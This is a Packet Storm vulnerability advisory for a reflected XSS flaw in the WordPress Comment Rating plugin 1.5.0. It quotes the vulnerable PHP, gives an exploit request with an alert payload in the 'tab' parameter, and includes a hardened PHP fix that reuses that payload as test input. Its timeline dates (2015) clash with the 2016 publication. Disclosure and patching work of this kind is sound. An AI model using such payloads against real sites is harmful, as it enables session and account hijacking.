WordPress Comment Rating 1.5.0 Cross Site Scripting

2016-01-30T00:00:00
ID PACKETSTORM:135520
Type packetstorm
Reporter Rahul Pratap Singh
Modified 2016-01-30T00:00:00

Description

## FULL DISCLOSURE
  
  
#Product : wp-comment-rating  
#Exploit Author : Rahul Pratap Singh  
#Version : 1.5.0  
#Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com  
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94  
#Date : 30/Jan/2016  
  
XSS Vulnerability:  
  
----------------------------------------  
Description:  
----------------------------------------  
The "tab" parameter is not sanitized before it is echoed into the page, which leads to reflected XSS.
  
----------------------------------------  
Vulnerable Code:  
----------------------------------------  
File Name: wpb_plugin_admin_page.php  
  
line:194  
$this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : '';  
  
line:553  
$active_tab = $this->current_tab;  
  
line:558  
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]->get_id() : $active_tab;
  
line:561  
<div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' . $active_tab; ?>">
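The defect above is that the raw value of `$_GET['tab']` is copied into `$active_tab` and then echoed into a `class` attribute without escaping. The following is an added example, not the plugin's own code: it keeps the same tab-selection logic but resolves the requested tab against an allow-list of registered tab IDs and attribute-escapes every dynamic value at output. It assumes WordPress's `sanitize_key()` and `esc_attr()`; minimal stand-ins are defined so the file also runs from the PHP CLI. The function names, the tab IDs and the page-hook value are constructed for the demonstration.

```php
<?php
// Added example (not the wp-comment-rating plugin's code): hardened handling
// of the "tab" request parameter described in the advisory.

// Stand-ins so the file runs outside WordPress; WordPress's own functions
// take precedence when they are loaded.
if ( ! function_exists( 'sanitize_key' ) ) {
    // WordPress sanitize_key(): lowercase, keep only [a-z0-9_-].
    function sanitize_key( $key ) {
        return preg_replace( '/[^a-z0-9_\-]/', '', strtolower( (string) $key ) );
    }
}
if ( ! function_exists( 'esc_attr' ) ) {
    // WordPress esc_attr(): HTML-attribute escaping.
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}

/**
 * Resolve the active tab from untrusted request input.
 *
 * @param array    $get     Request parameters (normally $_GET).
 * @param string[] $tab_ids IDs of the tabs the admin page actually registers.
 * @return string           A registered tab ID; never raw user input.
 */
function wpcr_resolve_active_tab( array $get, array $tab_ids ) {
    $requested = isset( $get['tab'] ) ? sanitize_key( $get['tab'] ) : '';

    // Allow-list check: only a registered tab ID is accepted. Anything else,
    // including an empty value, falls back to the first tab, which is the
    // behaviour the original line 558 intended for the empty case.
    if ( $requested !== '' && in_array( $requested, $tab_ids, true ) ) {
        return $requested;
    }
    return isset( $tab_ids[0] ) ? $tab_ids[0] : '';
}

/**
 * Build the wrapper div from line 561, with the dynamic part escaped as an
 * attribute value at the point of output.
 */
function wpcr_render_wrap( $page_hook, $active_tab ) {
    return '<div class="wrap wrap-'
        . esc_attr( $page_hook . ' active-tab-' . $active_tab )
        . '">';
}

// Constructed demonstration input: the registered tabs are hypothetical, and
// the hostile "tab" value mirrors the request shown in the advisory.
$registered_tabs = array( 'general', 'display', 'advanced' );
$hostile_get     = array( 'tab' => '"><input type=text onclick=alert(/XSS/)><!--' );

$tab = wpcr_resolve_active_tab( $hostile_get, $registered_tabs );
echo wpcr_render_wrap( 'comments_page_wpcommentrating', $tab ), PHP_EOL;
```

Two layers are applied on purpose: the allow-list means a value that was never a tab ID cannot reach the template at all, and `esc_attr()` at the echo means that even a registered ID containing an unexpected character could not break out of the attribute. Either one alone would have stopped the reported payload; together they also cover future tabs whose IDs are built from other data.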
  
----------------------------------------  
Exploit:  
----------------------------------------  
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab=">< input type=text onclick=alert(/XSS/)><!--
----------------------------------------  
  
POC:  
----------------------------------------  
https://0x62626262.files.wordpress.com/2016/01/wpcommentratingxsspoc1.png  
  
Fix:  
Update to 1.5.4  
  
Vulnerability Disclosure Timeline:  
→ January 24, 2015 – Bug discovered, initial report to Vendor  
→ January 25, 2015 – Vendor Acknowledged  
→ January 27, 2015 – Vendor Deployed a Patch  
  
#######################################  
# CTG SECURITY SOLUTIONS #  
# www.ctgsecuritysolutions.com <http://www.ctgsecuritysolutions.com/> #
#######################################  
  
Pub Ref:  
https://0x62626262.wordpress.com/2016/01/30/wp-comment-rating-xss-vulnerability/  
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710  